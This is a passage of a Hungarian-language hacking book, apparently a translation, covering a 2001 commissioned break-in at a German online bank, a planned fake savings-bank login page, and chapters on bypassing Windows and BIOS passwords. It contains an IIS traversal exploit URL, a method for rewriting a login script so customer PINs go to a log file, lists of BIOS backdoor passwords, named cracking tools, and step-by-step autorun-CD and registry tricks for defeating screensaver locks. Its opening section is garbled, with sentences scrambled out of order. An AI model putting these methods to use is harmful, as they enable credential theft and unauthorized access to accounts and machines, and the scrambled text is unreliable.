ahhoz először a webkönyvtárba kellett másolni. 1. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. mivel a sornak URL kódoltnak kellett lennie. ami végrehajtáshoz vezet. mint pl. és a kívánt bankot (a •••-t vagy a •••-t). Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez). és ezzel felhasználhatók más alkalmazások számára is. Amint a feltöltő-script a szerveren volt. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www. majd törölték. ha a CMD. Ebben a könyvtárban volt egy alkönyvtár. PIN kódjukat. letöltötték. illetve töltenek fel. amely szövegkarakterekből áll. A cookie-t mint HTTP_COOKIE-t tárolták. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. Tiltott kimenő kapcsolatok Az első terv az volt. Figyelembe kellett venni. illetve nincs szükségük ilyenekre. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél.> nem lehetett írni. és ezért itt már nem kellett foglalkozni vele! . meg lehet írni a CMD. Végül a fájlt törölni kellett.%c255winnt/system32/cmd. Hogy ezt a fájlt le lehessen tölteni. l . a sok nem alfanumerikus karakter miatt. Alapvetően az echo DOS-paranccsal lehet fájlokba írni.ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. ezeket nem lehetett a böngészőn keresztül bevinni. hogy ez a folyamat ne legyen olyan könnyen felfedezhető. Ez azonban meghiúsult azon. Az adatok. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. például a CMD. A bökkenő az írás volt. Tehát engedélyezett kapcsolatból kellett olvasni és írni. PIN-jét és IP-jét.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA.. hogy tiltva voltak a kimenő kapcsolatok. viszont bináris adatokat és metakaraktereket. A támadási tervről Bináris fájlokat ASP-scripttel írnak.vagy 10-jegyű online számukat. majd egy hiperhivat-kozáson keresztül lehetett letölteni. Az ASP-scriptet. amelyeknek a webszerver a környezete.EXE-vel.EXE-t... környezeti változóként tárolódnak.3. ami azután kényelmes olvasási és írási elérést kínálna. Az ügyfeleket felkérik. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták.EXE-t a /c paraméterrel (egyedüli parancs) futtatták. amelyeket az online banki szolgáltatás használ. Az utolsó és legnagyobb dobás az volt. amelybe csak egy kódolt kapcsolattal lehet bejutni..exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál. hogy az első lépés már el volt intézve. hogy gépeljék be 6.böngészőből.: <. A sorokat tehát cookie-ként küldték el. ezért egyfajta shellt kaptak a böngészőn keresztül. hogy egyszerűen féltőkének egy trójait. az SSL miatt) tárolja a rendszer. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt. Az IIS „sípolta" a konzolfájlok kiadását. és a sorok „komplex" módon épülnek fel.de/scripts/. mivel a bank scriptjei nem hajtanak végre bináris fájlokat. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak. át lehetett írni a bejelentkező-scriptet úgy. A szövegkarakterekkel nem is volt gond. Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna.

1. 08. Az adatokat végül az NDR jogi osztályának adták át.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára. A •• bank a Hamburgi Területi Bíróságon 2001. amelyben úgy ítéltek.5 millió adatot (online számokat.08. ahol bezárták egy széfbe ezeket. pineket.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági . hogy Ideiglenes Intézkedést adjanak ki. és ott egy széfbe zárták.4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001.10.31-ig folyt. IP-címeket) mentettek le.04-én elérte. 1. amelyet egy semleges közjegyzőnek adtak át Hamburgban. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség. hogy egy pillantást vessenek az ügyfelek részvényletétjére.04-től 2001. hogy minden adatot vissza kell szolgáltatni nekik.A Bank. Ebben az időben több mint 1. Az NDR bizonyítékként csak egy másolatot tartott meg.

hogy betörjenek a ••• online banki szerverébe. szept. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen.newsbytes.washingtonpost. „A (bankszámla) információkkal. és információkat töltsenek le az ügyfelek számláiról. Németország két közszolgálati tévéhálózatának egyike gyárt. du. amelyeknek a birtokába jutottunk. a ••• müncheni szóvivője.kezekben van. Az információk neveket. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). Láttam már olyan banki számítógépeket. aki amúgy jól ismert személyiség Németországban. .. 4:51 ••••. Mindenesetre bőven van még tennivaló. Az e-banking területet védeni kell. így ékelődött: „Tudják. hogy van egy nyilvános rész. ha az „a köz érdekét szolgálja". most akárhol is lehetnénk a világban. amelyet mindenki elérhet (WWW/HTTP). és ez meg is történik (a legújabb patchek. A nyilvános részt elhanyagolhatják." 1. Marc Riief-fel. Leptihn. Azután van egy félig nyilványos terület. mivel néhány nagy bank biztonsági tanácsadója. de mostanáig soha nem vesztettem el egyetlen ügyet sem. NÉMETORSZÁG 2001. az törvénytelen. akikre utalt. A www. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel).. a Technikai Tanácsadó nevű tv-show. A következőket mondta: „Sok bank webes fellépése megosztott. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. hogy mondjam: vannak ilyenek és olyanok is. Ruef pontosan ismeri a gondot. Az „ők". Newsbytes MÜNCHEN. hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog. mivel nincs meg a szükséges háttértudásuk. amelyet az ARD. én 30 éve csinálok törvénytelen dolgokat. Nem szabad valamennyit egy kalap alá venni. aki 27 éve a Technical Adviser frontembere. Cornelia Klaila. a bankok biztonsági problematikájáról. Szerintem a bökkenő a kiértékelésnél van. hogy nem aggódik a ••• perindítása miatt. Németország egyik legnagyobb bankja. a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése. A sztorit vasárnap este közvetítették. amelyek fontosak a biztonságos online banki szolgáltatáshoz. Leptihn szerint. Ezeknek az adminisztrációja is többnyire jó . Voltak pereim ezelőtt is. Bernd Leptihn. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival." Azt mondta. millió és millió euró birtokában" mondta. az e~banking. Ezzel azt akarom mondani. ezt nyilatkozta a Newsbytes-nak: „Amit tettek.szakértővel. 17. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl.com és a www.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. És persze vannak olyan intézmények is. biztosított rendszer. számlaszámokat. erős irányvonalak. de most a kamera mögött dolgozik. Ösz-szességében azt kell. hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat. Nagyon törvénytelen. amely hackereket szerződtetett. PIN-számokat és internetes IP-számokat tartalmaztak. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert.com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. megfelelő biztonsági intézkedések). hogy feltörjék a bank online banking szerverét.. íme két érdekes vélemény. Az erre hivatott rendszeradminisztrátorok. Számtalan újság és rádióállomás számolt be az akcióról. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat). amelyek kitűnő kompetenciával tűnnek ki.de sajnos nem nagyon jó .

A zdnet. és sikerrel jártak" -állította. hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt. „Még el kell döntenünk. amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. Azt hiszem. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából. Weide azt nyilatkozta a Newsbytes-nak.mint mondta mindkét oldal. Ahogy az ARD a továbbiakban közölte.0) használta.5 millió online könyvelési akciót megszerezni." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet." Weide és Leptihn elmondták. Mikor megkérdeztük. Weide azt mondta. féltek. de ez „nem volt sok". hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna. A fiatal hackerek inkább abban voltak érdekeltek. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot. és hogy ez az oldal state-of-the-art rendszer. Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira. és „igazán nem volt gond. s így. ami biztonságos. 1. a bank szóvivője. egy új log-in redszert vezettek be. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével. a régi és az új is online-ban voltak.7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen.de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt. azt mondta: „Nem mondtak csúnya szavakat. Augusztus hónap folyamán . Négyük közül az egyik Stephan Weide.Leptihn arra is utalt. hogy elveszítik az állásukat. „A hackereink ismét próbálkoztak az új site-on. hogy a kutatás megmutatta. a hackereknek dispo-kredit adatokat is sikerült elérniük. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen. más bankoknál is csak félig-meddig . Azt nem árulta el. Azt is jelezte. Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni. hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat". és a hackerek a régi weboldalra. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1.vélekedett. és nem az újra törtek be. Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket. hogy megmondják nekik. Klaila azt mondta. Leptihn viszont vitatta. mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben." . mit is akarunk tenni.t választották. A Ratgeber szerkesztősége szerint azért a •••. A bank a Microsoft Internet Information Serverét (IIS 4. hogy a ••• banknál bizony van néhány nagy biztonsági rés. beleértve titkos kódokat (PIN). A régi weboldalt szeptember elején offline-ba helyezték. hogy mennyit fizettek nekik. s azt állította. hogyan tudják befoltozni a réseket. az online-számokat (TAN) és az IP-címeket. Klaila.mondta. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés. hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek .. hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. 2001. ezt nyomatékosan kétségbe vonta. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében. bárki meg tudta volna tenni. a számlákat a kimerítésig terhelhették volna. szeptember 17. működő kamera előtt törték fel a ••• biztonsági mechanizmusait. hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe.

sikeresek a szerverük védelmére irányuló intézkedések. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. és a rendszergazda is szívesen elhanyagolja.1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. 1. mint a legtöbbnek Németoszágban: két részből áll. Nyíltszívűen . amelyek nagyon támadhatóvá teszik a szervert. amely csak nagyon egyszerűen védett. A szerverek többnyire jól védettek. A második terület a tulajdonképpeni e-banking. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó. Bepillantás egy német tararékpénztár jelszó-fájljába. a következő terv született.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása. amelyeket az előző akciókból gyűjtöttek. amelyben az ügyfél az illető tararékpénztárról információt szerezhet. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz . A tapasztalatokból. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna. Van a nyilvános rész.7. Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. Ez általában egészen egyszerű felépítésű. és ki lehet indulni abból. és amelyen keresztül egy linkkel a folyószámlájához jut.

amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. amely lehetővé teszi az illető bank. A betörés után megváltoztattak minden oldalt. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak. Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. illetve takarékpénztár nyilvános szerverének az elérését.A támadási terv Először egy biztonsági rést próbáltak keresni. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján .

mint a valódi e-banking gépen. Ha most egy átutaláshoz beírja az adatokat. Mivel a tranzakciók egyike sem lesz végrehajtva. Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt. hanem csak a logfájlba vándorol.hozzákezdtek egy hamisítvány felépítéséhez. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné". ezek az adatok egy logfájlban landolnak. „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" . a tranzakciószámok továbbra is érvényben maradnak. tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti.

veszélyes biztonsági rések 2.2 A jelszófájlok 2.1.1 Érdekes jelszavak szinte mindenütt akadnak 2.1 A hackeren túl .a betörés előkészítése CD-vel 2.3.3 Képernyővédő-jelszó .3.1.4 További támadási technikák .3.2 A fizikai támadás 2.4 Jelszóval védett megosztások 2.és nyomtatómegosztás .1 Különbségek a Windows 9x.4 Automatikus lejátszás .3 Milyen lehetőségeik vannak a betolakodóknak? 2.2 A jelszavak kikémlelése 2.1 A fájl.3 A távoli elérésű támadás internet.2.3.3.6 Óvintézkedések 2.Tartalom 2. az NT és utódai között 2.vagy hálózati felhasználók.2.a bennfenteseknek nem okoz problémát 2.3 Jelszavak a Windows 2000 alatt 2.3.2 Mik azok a szkennerek. adatbetekintés vagy lopás 2. fejezet .1.2.2.merevlemez-fejreállás. és hogyan működnek? 2. vigyázat! 2.1.5 Brute Force-rohamok a megosztási jelszavak ellen 2.

illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . a hackereknek arra is vannak módszereik.1. És akkor a további kockázatokat.2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot. akinek közvetlen elérése van a rendszerre. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. NT.0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is. ami sok . amely növeli a biztonságot. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez . lopás stb. 2. a másik a távoli elérésű támadás. amelyet az internetről indítanak. és vele együtt a BIOS. azt a későbbiekben megmutatjuk.A Windows-rendszerek (9x. Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát. amelyeknek az elvesztése. ami igazán csak most. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak. Az egyik a fizikai támadás. például egy lopásét. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. és azokról a veszélyekről. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok. A magánfelhasználók. illetve feltörni a védelmet. hogy minél öregebb egy számítógép. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben. ez a fejezet az adatbiztonság egészével foglalkozik. A BIOS-jelszavas lezárás megkerülésének.1 Különbségek a Windows 9x. ha 2. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. illetve az újbóli előállítása a PC árának többszörösébe kerülne. mielőtt a grafikus felület megjelenne. Alapigazság. vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. 2. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik.1.1 A hackeren túl . Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. amelyet a felhasználónak a számítógép minden indításához be kell írnia. hogy behatoljanak a rendszerekbe. ami a 9x-nél kiegészítő szoftvertől függ.a legtöbb? . amelyeknek az adataikat kiteszik. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. annál könnyebb kikerülni. a professzionális területre készült termékek (Windows NT 4. amit olyan valaki hajt végre.merevlemez-fejreállás.esetben egyáltalán nem történik meg.és még a legfifikásabb BIOS-jelszó sem ér sokat.) vagy a hibás kezelés veszélyezteti. akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség. A hackereket egyenesen csalogatják a gyenge pontok. Sajnos. ami a BlOS-jelszónál kezdődik. mint köztes fokozat.

Azt persze figyelembe kell vennie. A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi. ezek közül az egyik legismertebb a KiLLCMOS32.de www. Mindenesetre a rendszernek már futnia kell a használatához. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra.I. Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani.hackerzbook.de AMI Award Gyártó: AMI PASSWORD Ami A. de valójában a legtöbbnél kérdéses. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők". Ezeknek a jelszavaknak a többségét sikerrel teszteltük.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy .hackerzbook. amelyeket könnyen be lehet szerezni az internetről. arra az esetre. Ez a segédprogram minden beállítást töröl.Dynam ic FalCoN 'N' AleX Forrás www.hackerzbook. . Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten. hogy a gép már elindult.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót. vagy már teljesen elavultak.de www. és minden BIOS-verzióhoz használható. AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot. A különböző BIOS-verziókhoz különböző programok vannak. mint törölni a BIOS-t. hogy vajon még működnek-e.hackerzbook.M.hackerzbook. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót. hogy ilyenkor a rendszerbeállítások is elvesznek.de www. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát. nem marad más hátra.de www. és azzal együtt a jelszót is. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1.

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek. Különösen veszélyes ez a telefonos kapcsolatnál. . A Windows 95/98/ME alatt minden program eléri a PWL fájlokat.az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban. a Microsoft nagyon megkönnyíti a betolakodóknak. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek.mondják. hogy valaki. A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. Példa: ha a Windowsba Jani néven jelentkezünk be. Sajnos. a PWL fájl nevejani. az adatokat kiolvasva. mert akár odáig vezethet. A PWL a PassWord Library rövidítése.2. hétfő . akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten.. a telefonos kapcsolat jelszavai és a Windows bejelentkező nevek. november 5. Münsterben már 3600 nyomozási eljárás lezárult. A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat. Praktikus segítség a felhasználóknak és a betörőknek . amely a belépési adatok megadása után megkérdezi a felhasználótól. hogy adatokat tudjon elhelyezni bennük. a felhasználó költéségén szörfözhet az interneten. hogy szeretné-e menteni ezeket.silicon.internetet vagy a hálózatot. hogy hozzáférjenek ezekhez az információkhoz. Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. verziótól kezdve egy automatikus kiegészítést használ. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. Egy kb. íme egy aktuális példa: 2001. a felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését. Minden felhasználói profil tartalmaz egy saját PWL fájt. a fájlnév pedig a mindenkori felhasználó 